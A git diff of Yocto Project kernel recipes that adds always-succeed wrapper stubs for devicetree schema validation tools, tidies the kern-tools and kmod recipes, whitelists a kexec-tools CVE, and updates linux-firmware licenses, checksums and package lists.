BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate
new file mode 100644
index 0000000000..2aa57851c7
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-doc-validate wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
+# exec dt-doc-validate.real "$@"
+
+# we always succeed
+exit 0
+
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema
new file mode 100644
index 0000000000..24b89d8619
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-mk-schema wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
+# exec dt-mk-schema.real "$@"
+
+# we always succeed
+exit 0
+
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate
new file mode 100644
index 0000000000..8a4710a7ed
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-validate wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
+# exec dt-validate.real "$@"
+
+# we always succeed
+exit 0
+
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb b/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb
new file mode 100644
index 0000000000..c869274d09
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb
@@ -0,0 +1,17 @@
+DESCRIPTION = "Wrapper for tooling for devicetree validation using YAML and jsonschema"
+HOMEPAGE = "https://yoctoproject.org"
+LICENSE = "MIT"
+LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
+
+SRC_URI = "file://dt-doc-validate \
+ file://dt-mk-schema \
+ file://dt-validate"
+
+do_install() {
+ install -d ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-doc-validate ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-mk-schema ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-validate ${D}${bindir}/
+}
+
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
index 4f1af731d6..82d678e509 100644
--- a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
+++ b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
@@ -1,4 +1,8 @@
SUMMARY = "Tools for managing Yocto Project style branched kernels"
+DESCRIPTION = "Powerful set of tools or managing Yocto Linux kernel sources \
+and configuration data. You can use these tools to make a single configuration \
+change, apply multiple patches, or work with your own kernel sources."
+HOMEPAGE = "https://www.yoctoproject.org/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://tools/kgit;beginline=5;endline=9;md5=9c30e971d435e249624278c3e343e501"
@@ -10,7 +14,7 @@ PV = "0.2+git${SRCPV}"
inherit native
-SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git"
+SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git;branch=master"
S = "${WORKDIR}/git"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb b/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
index 871b36440f..206c6ccae7 100644
--- a/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
+++ b/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
@@ -30,6 +30,9 @@ inherit autotools update-rc.d systemd
export LDFLAGS = "-L${STAGING_LIBDIR}"
EXTRA_OECONF = " --with-zlib=yes"
+# affects kexec-tools shipped by Fedora versions prior to 2.0.21-8 and RHEL versions prior to 2.0.20-47.
+CVE_CHECK_WHITELIST += "CVE-2021-20269"
+
do_compile_prepend() {
# Remove the prepackaged config.h from the source tree as it overrides
# the same file generated by configure and placed in the build tree
diff --git a/meta/recipes-kernel/kmod/kmod.inc b/meta/recipes-kernel/kmod/kmod.inc
index 5dae30ed88..631b50658a 100644
--- a/meta/recipes-kernel/kmod/kmod.inc
+++ b/meta/recipes-kernel/kmod/kmod.inc
@@ -18,7 +18,7 @@ SRCREV = "58133a96c894c043e48c74ddf0bfe8db90bac62f"
# Lookout for PV bump too when SRCREV is changed
PV = "26"
-SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \
+SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git;branch=master \
file://depmod-search.conf \
file://0001-build-Stop-using-dolt.patch \
file://avoid_parallel_tests.patch \
@@ -26,7 +26,6 @@ SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \
S = "${WORKDIR}/git"
-EXTRA_AUTORECONF += "--install --symlink"
EXTRA_OECONF +=" --enable-tools --with-zlib"
PACKAGECONFIG[debug] = "--enable-debug,--disable-debug"
diff --git a/meta/recipes-kernel/kmod/kmod/ptest.patch b/meta/recipes-kernel/kmod/kmod/ptest.patch
deleted file mode 100644
index 831dbcb909..0000000000
--- a/meta/recipes-kernel/kmod/kmod/ptest.patch
+++ /dev/null
@@ -1,25 +0,0 @@
-Add 'install-ptest' rule.
-
-Signed-off-by: Tudor Florea <tudor.florea@enea.com>
-Upstream-Status: Pending
-
-diff -ruN a/Makefile.am b/Makefile.am
---- a/Makefile.am 2013-07-12 17:11:05.278331557 +0200
-+++ b/Makefile.am 2013-07-12 17:14:27.033788016 +0200
-@@ -204,6 +204,16 @@
-
- distclean-local: $(DISTCLEAN_LOCAL_HOOKS)
-
-+install-ptest:
-+ @$(MKDIR_P) $(DESTDIR)/testsuite
-+ @for file in $(TESTSUITE); do \
-+ install $$file $(DESTDIR)/testsuite; \
-+ done;
-+ @sed -e 's/^Makefile/_Makefile/' < Makefile > $(DESTDIR)/Makefile
-+ @$(MKDIR_P) $(DESTDIR)/tools
-+ @cp $(noinst_SCRIPTS) $(noinst_PROGRAMS) $(DESTDIR)/tools
-+ @cp -r testsuite/rootfs testsuite/.libs $(DESTDIR)/testsuite
-+
- # ------------------------------------------------------------------------------
- # custom release helpers
- # ------------------------------------------------------------------------------
diff --git a/meta/recipes-kernel/linux-firmware/linux-firmware_20201022.bb b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
index 045f2647e0..873ba9cdf0 100644
--- a/meta/recipes-kernel/linux-firmware/linux-firmware_20201022.bb
+++ b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
@@ -1,4 +1,8 @@
SUMMARY = "Firmware files for use with Linux kernel"
+HOMEPAGE = "https://www.kernel.org/"
+DESCRIPTION = "Linux firmware is a package distributed alongside the Linux kernel \
+that contains firmware binary blobs necessary for partial or full functionality \
+of certain hardware devices."
SECTION = "kernel"
LICENSE = "\
@@ -23,7 +27,6 @@ LICENSE = "\
& Firmware-go7007 \
& Firmware-GPLv2 \
& Firmware-hfi1_firmware \
- & Firmware-i2400m \
& Firmware-i915 \
& Firmware-ibt_firmware \
& Firmware-ice \
@@ -31,6 +34,7 @@ LICENSE = "\
& Firmware-iwlwifi_firmware \
& Firmware-IntcSST2 \
& Firmware-kaweth \
+ & Firmware-Lontium \
& Firmware-Marvell \
& Firmware-moxa \
& Firmware-myri10ge_firmware \
@@ -41,6 +45,7 @@ LICENSE = "\
& Firmware-phanfw \
& Firmware-qat \
& Firmware-qcom \
+ & Firmware-qcom-yamato \
& Firmware-qla1280 \
& Firmware-qla2xxx \
& Firmware-qualcommAthos_ar3k \
@@ -52,7 +57,6 @@ LICENSE = "\
& Firmware-rtlwifi_firmware \
& Firmware-imx-sdma_firmware \
& Firmware-siano \
- & Firmware-tda7706-firmware \
& Firmware-ti-connectivity \
& Firmware-ti-keystone \
& Firmware-ueagle-atm4-firmware \
@@ -67,8 +71,8 @@ LICENSE = "\
LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.adsp_sst;md5=615c45b91a5a4a9fe046d6ab9a2df728 \
file://LICENCE.agere;md5=af0133de6b4a9b2522defd5f188afd31 \
- file://LICENSE.amdgpu;md5=d357524f5099e2a3db3c1838921c593f \
- file://LICENSE.amd-ucode;md5=3c5399dc9148d7f0e1f41e34b69cf14f \
+ file://LICENSE.amdgpu;md5=a2589a05ea5b6bd2b7f4f623c7e7a649 \
+ file://LICENSE.amd-ucode;md5=6ca90c57f7b248de1e25c7f68ffc4698 \
file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \
file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \
file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \
@@ -86,14 +90,14 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.go7007;md5=c0bb9f6aaaba55b0529ee9b30aa66beb \
file://GPL-2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://LICENSE.hfi1_firmware;md5=5e7b6e586ce7339d12689e49931ad444 \
- file://LICENCE.i2400m;md5=14b901969e23c41881327c0d9e4b7d36 \
file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \
file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \
file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \
file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \
file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \
- file://LICENCE.iwlwifi_firmware;md5=3fd842911ea93c29cd32679aa23e1c88 \
+ file://LICENCE.iwlwifi_firmware;md5=2ce6786e0fc11ac6e36b54bb9b799f1b \
file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \
+ file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \
file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \
file://LICENCE.mediatek;md5=7c1976b63217d76ce47d0a11d8a79cf2 \
file://LICENCE.moxa;md5=1086614767d8ccf744a923289d3d4261 \
@@ -104,8 +108,9 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \
file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \
file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \
- file://LICENCE.qat_firmware;md5=9e7d8bea77612d7cc7d9e9b54b623062 \
+ file://LICENCE.qat_firmware;md5=72de83dfd9b87be7685ed099a39fbea4 \
file://LICENSE.qcom;md5=164e3362a538eb11d3ac51e8e134294b \
+ file://LICENSE.qcom_yamato;md5=d0de0eeccaf1843a850bf7a6777eec5c \
file://LICENCE.qla1280;md5=d6895732e622d950609093223a2c4f5d \
file://LICENCE.qla2xxx;md5=505855e921b75f1be4a437ad9b79dff0 \
file://LICENSE.QualcommAtheros_ar3k;md5=b5fe244fb2b532311de1472a3bc06da5 \
@@ -117,7 +122,6 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.rtlwifi_firmware.txt;md5=00d06cfd3eddd5a2698948ead2ad54a5 \
file://LICENSE.sdma_firmware;md5=51e8c19ecc2270f4b8ea30341ad63ce9 \
file://LICENCE.siano;md5=4556c1bf830067f12ca151ad953ec2a5 \
- file://LICENCE.tda7706-firmware.txt;md5=835997cf5e3c131d0dddd695c7d9103e \
file://LICENCE.ti-connectivity;md5=c5e02be633f1499c109d1652514d85ec \
file://LICENCE.ti-keystone;md5=3a86335d32864b0bef996bee26cc0f2c \
file://LICENCE.ueagle-atm4-firmware;md5=4ed7ea6b507ccc583b9d594417714118 \
@@ -126,8 +130,11 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \
file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \
file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \
- file://WHENCE;md5=daf28db5d6353de0a886f08106cffa22 \
+ file://WHENCE;md5=${WHENCE_CHKSUM} \
"
+# WHENCE checksum is defined separately to ease overriding it if
+# class-devupstream is selected.
+WHENCE_CHKSUM = "a344e6c28970fc7daafa81c10247aeb6"
# These are not common licenses, set NO_GENERIC_LICENSE for them
# so that the license files will be copied from fetched source
@@ -153,7 +160,6 @@ NO_GENERIC_LICENSE[Firmware-fw_sst_0f28] = "LICENCE.fw_sst_0f28"
NO_GENERIC_LICENSE[Firmware-go7007] = "LICENCE.go7007"
NO_GENERIC_LICENSE[Firmware-GPLv2] = "GPL-2"
NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware"
-NO_GENERIC_LICENSE[Firmware-i2400m] = "LICENCE.i2400m"
NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915"
NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware"
NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice"
@@ -161,6 +167,7 @@ NO_GENERIC_LICENSE[Firmware-IntcSST2] = "LICENCE.IntcSST2"
NO_GENERIC_LICENSE[Firmware-it913x] = "LICENCE.it913x"
NO_GENERIC_LICENSE[Firmware-iwlwifi_firmware] = "LICENCE.iwlwifi_firmware"
NO_GENERIC_LICENSE[Firmware-kaweth] = "LICENCE.kaweth"
+NO_GENERIC_LICENSE[Firmware-Lontium] = "LICENSE.Lontium"
NO_GENERIC_LICENSE[Firmware-Marvell] = "LICENCE.Marvell"
NO_GENERIC_LICENSE[Firmware-mediatek] = "LICENCE.mediatek"
NO_GENERIC_LICENSE[Firmware-moxa] = "LICENCE.moxa"
@@ -172,6 +179,7 @@ NO_GENERIC_LICENSE[Firmware-ath9k-htc] = "LICENCE.open-ath9k-htc-firmware"
NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw"
NO_GENERIC_LICENSE[Firmware-qat] = "LICENCE.qat_firmware"
NO_GENERIC_LICENSE[Firmware-qcom] = "LICENSE.qcom"
+NO_GENERIC_LICENSE[Firmware-qcom-yamato] = "LICENSE.qcom_yamato"
NO_GENERIC_LICENSE[Firmware-qla1280] = "LICENCE.qla1280"
NO_GENERIC_LICENSE[Firmware-qla2xxx] = "LICENCE.qla2xxx"
NO_GENERIC_LICENSE[Firmware-qualcommAthos_ar3k] = "LICENSE.QualcommAtheros_ar3k"
@@ -183,7 +191,6 @@ NO_GENERIC_LICENSE[Firmware-ralink-firmware] = "LICENCE.ralink-firmware.txt"
NO_GENERIC_LICENSE[Firmware-rtlwifi_firmware] = "LICENCE.rtlwifi_firmware.txt"
NO_GENERIC_LICENSE[Firmware-siano] = "LICENCE.siano"
NO_GENERIC_LICENSE[Firmware-imx-sdma_firmware] = "LICENSE.sdma_firmware"
-NO_GENERIC_LICENSE[Firmware-tda7706-firmware] = "LICENCE.tda7706-firmware.txt"
NO_GENERIC_LICENSE[Firmware-ti-connectivity] = "LICENCE.ti-connectivity"
NO_GENERIC_LICENSE[Firmware-ti-keystone] = "LICENCE.ti-keystone"
NO_GENERIC_LICENSE[Firmware-ueagle-atm4-firmware] = "LICENCE.ueagle-atm4-firmware"
@@ -196,9 +203,16 @@ NO_GENERIC_LICENSE[WHENCE] = "WHENCE"
PE = "1"
-SRC_URI = "${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz"
+SRC_URI = "\
+ ${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz \
+"
+
+BBCLASSEXTEND = "devupstream:target"
+SRC_URI:class-devupstream = "git://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git;protocol=https;branch=main"
+# Pin this to the 20220509 release, override this in local.conf
+SRCREV:class-devupstream ?= "b19cbdca78ab2adfd210c91be15a22568e8b8cae"
-SRC_URI[sha256sum] = "bf586e0beb4c65f22bf0a79811f259aa0a5a7cc9f70eebecb260525b6914cef7"
+SRC_URI[sha256sum] = "bf0f239dc0801e9d6bf5d5fb3e2f549575632cf4688f4348184199cb02c2bcd7"
inherit allarch
@@ -209,7 +223,8 @@ do_compile() {
}
do_install() {
- oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install
+ # install-nodedup avoids rdfind dependency
+ oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install-nodedup
cp GPL-2 LICEN[CS]E.* WHENCE ${D}${nonarch_base_libdir}/firmware/
}
@@ -222,8 +237,10 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \
${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \
${PN}-vt6656-license ${PN}-vt6656 \
+ ${PN}-rs9113 ${PN}-rs9116 \
${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \
${PN}-rtl8168 \
+ ${PN}-rtl8822 \
${PN}-cypress-license \
${PN}-broadcom-license \
${PN}-bcm-0bb4-0306 \
@@ -261,7 +278,7 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-bcm43xx-hdr \
${PN}-atheros-license ${PN}-ar9170 ${PN}-ath6k ${PN}-ath9k \
${PN}-gplv2-license ${PN}-carl9170 \
- ${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-qca \
+ ${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-ath11k ${PN}-qca \
\
${PN}-imx-sdma-license ${PN}-imx-sdma-imx6q ${PN}-imx-sdma-imx7d \
\
@@ -293,11 +310,22 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-nvidia-gpu \
${PN}-netronome-license ${PN}-netronome \
${PN}-qat ${PN}-qat-license \
- ${PN}-qcom-license \
+ ${PN}-qcom-license ${PN}-qcom-yamato-license \
${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \
- ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a530 ${PN}-qcom-adreno-a630 \
- ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \
+ ${PN}-qcom-vpu-1.0 ${PN}-qcom-vpu-2.0 \
+ ${PN}-qcom-adreno-a2xx ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a4xx ${PN}-qcom-adreno-a530 \
+ ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 \
+ ${PN}-qcom-apq8016-modem ${PN}-qcom-apq8016-wifi \
+ ${PN}-qcom-apq8096-adreno ${PN}-qcom-apq8096-audio ${PN}-qcom-apq8096-modem \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-compat \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-audio \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-adreno \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-compute \
+ ${PN}-qcom-sc8280xp-lenovo-x13s-sensors \
+ ${PN}-qcom-sdm845-adreno ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \
+ ${PN}-qcom-sm8250-adreno ${PN}-qcom-sm8250-audio ${PN}-qcom-sm8250-compute \
${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \
+ ${PN}-lt9611uxc ${PN}-lontium-license \
${PN}-whence-license \
${PN}-license \
"
@@ -340,7 +368,7 @@ FILES_${PN}-carl9170 = " \
RDEPENDS_${PN}-carl9170 += "${PN}-gplv2-license"
# For QualCommAthos
-LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k"
+LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k & Firmware-atheros_firmware"
LICENSE_${PN}-ar3k-license = "Firmware-qualcommAthos_ar3k"
LICENSE_${PN}-ath10k = "Firmware-qualcommAthos_ath10k"
LICENSE_${PN}-ath10k-license = "Firmware-qualcommAthos_ath10k"
@@ -356,12 +384,17 @@ FILES_${PN}-ath10k = " \
${nonarch_base_libdir}/firmware/ath10k \
"
+FILES_${PN}-ath11k = " \
+ ${nonarch_base_libdir}/firmware/ath11k \
+"
+
FILES_${PN}-qca = " \
${nonarch_base_libdir}/firmware/qca \
"
-RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license"
+RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license ${PN}-atheros-license"
RDEPENDS_${PN}-ath10k += "${PN}-ath10k-license"
+RDEPENDS_${PN}-ath11k += "${PN}-ath10k-license"
RDEPENDS_${PN}-qca += "${PN}-ath10k-license"
# For ralink
@@ -381,7 +414,7 @@ LICENSE_${PN}-mt7601u-license = "Firmware-ralink_a_mediatek_company_firmware"
FILES_${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware"
FILES_${PN}-mt7601u = " \
- ${nonarch_base_libdir}/firmware/mt7601u.bin \
+ ${nonarch_base_libdir}/firmware/mediatek/mt7601u.bin \
"
RDEPENDS_${PN}-mt7601u += "${PN}-mt7601u-license"
@@ -397,6 +430,12 @@ FILES_${PN}-radeon = " \
RDEPENDS_${PN}-radeon += "${PN}-radeon-license"
+# For lontium
+LICENSE_${PN}-lt9611uxc = "Firmware-Lontium"
+
+FILES_${PN}-lontium-license = "${nonarch_base_libdir}/firmware/LICENSE.Lontium"
+FILES_${PN}-lt9611uxc = "${nonarch_base_libdir}/firmware/lt9611uxc_fw.bin"
+
# For marvell
LICENSE_${PN}-pcie8897 = "Firmware-Marvell"
LICENSE_${PN}-pcie8997 = "Firmware-Marvell"
@@ -477,6 +516,13 @@ FILES_${PN}-netronome = " \
${nonarch_base_libdir}/firmware/netronome/nic_AMDA0096*.nffw \
${nonarch_base_libdir}/firmware/netronome/nic_AMDA0097*.nffw \
${nonarch_base_libdir}/firmware/netronome/nic_AMDA0099*.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0011_2x40.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0012_2x40.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0078-0011_1x100.nffw \
+ ${nonarch_base_libdir}/firmware/netronome/bpf \
+ ${nonarch_base_libdir}/firmware/netronome/flower \
+ ${nonarch_base_libdir}/firmware/netronome/nic \
+ ${nonarch_base_libdir}/firmware/netronome/nic-sriov \
"
RDEPENDS_${PN}-netronome += "${PN}-netronome-license"
@@ -501,6 +547,17 @@ FILES_${PN}-nvidia-license = "${nonarch_base_libdir}/firmware/LICENCE.nvidia"
RDEPENDS_${PN}-nvidia-gpu += "${PN}-nvidia-license"
RDEPENDS_${PN}-nvidia-tegra += "${PN}-nvidia-license"
+RDEPENDS_${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license"
+
+# For RSI RS911x WiFi
+LICENSE_${PN}-rs9113 = "WHENCE"
+LICENSE_${PN}-rs9116 = "WHENCE"
+
+FILES_${PN}-rs9113 = " ${nonarch_base_libdir}/firmware/rsi/rs9113*.rps "
+FILES_${PN}-rs9116 = " ${nonarch_base_libdir}/firmware/rsi/rs9116*.rps "
+
+RDEPENDS_${PN}-rs9113 += "${PN}-whence-license"
+RDEPENDS_${PN}-rs9116 += "${PN}-whence-license"
# For rtl
LICENSE_${PN}-rtl8188 = "Firmware-rtlwifi_firmware"
@@ -509,6 +566,7 @@ LICENSE_${PN}-rtl8192ce = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8192su = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8723 = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8821 = "Firmware-rtlwifi_firmware"
+LICENSE_${PN}-rtl8822 = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl-license = "Firmware-rtlwifi_firmware"
LICENSE_${PN}-rtl8168 = "WHENCE"
@@ -536,6 +594,11 @@ FILES_${PN}-rtl8821 = " \
FILES_${PN}-rtl8168 = " \
${nonarch_base_libdir}/firmware/rtl_nic/rtl8168*.fw \
"
+FILES_${PN}-rtl8822 = " \
+ ${nonarch_base_libdir}/firmware/rtl_bt/rtl8822*.bin \
+ ${nonarch_base_libdir}/firmware/rtw88/rtw8822*.bin \
+ ${nonarch_base_libdir}/firmware/rtlwifi/rtl8822*.bin \
+"
RDEPENDS_${PN}-rtl8188 += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8192ce += "${PN}-rtl-license"
@@ -543,6 +606,7 @@ RDEPENDS_${PN}-rtl8192cu += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8192su = "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8723 += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8821 += "${PN}-rtl-license"
+RDEPENDS_${PN}-rtl8822 += "${PN}-rtl-license"
RDEPENDS_${PN}-rtl8168 += "${PN}-whence-license"
# For ti-connectivity
@@ -602,7 +666,9 @@ FILES_${PN}-bcm4329 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4329-sdio.bi
FILES_${PN}-bcm4330 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4330-sdio.*"
FILES_${PN}-bcm4334 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4334-sdio.bin"
FILES_${PN}-bcm4335 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4335-sdio.bin"
-FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin"
+FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4339-sdio.bin \
+"
FILES_${PN}-bcm43241b0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b0-sdio.bin"
FILES_${PN}-bcm43241b4 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b4-sdio.bin"
FILES_${PN}-bcm43241b5 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b5-sdio.bin"
@@ -611,12 +677,18 @@ FILES_${PN}-bcm43143 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43143.bin \
${nonarch_base_libdir}/firmware/brcm/brcmfmac43143-sdio.bin \
"
FILES_${PN}-bcm43430a0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430a0-sdio.*"
-FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.*"
+FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43455-sdio.* \
+"
FILES_${PN}-bcm4350c2 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350c2-pcie.bin"
FILES_${PN}-bcm4350 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350-pcie.bin"
-FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.bin"
+FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-sdio.* \
+"
FILES_${PN}-bcm43569 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43569.bin"
-FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin"
+FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43570-pcie.bin \
+"
FILES_${PN}-bcm4358 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4358-pcie.bin"
FILES_${PN}-bcm43602 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.bin \
${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.ap.bin \
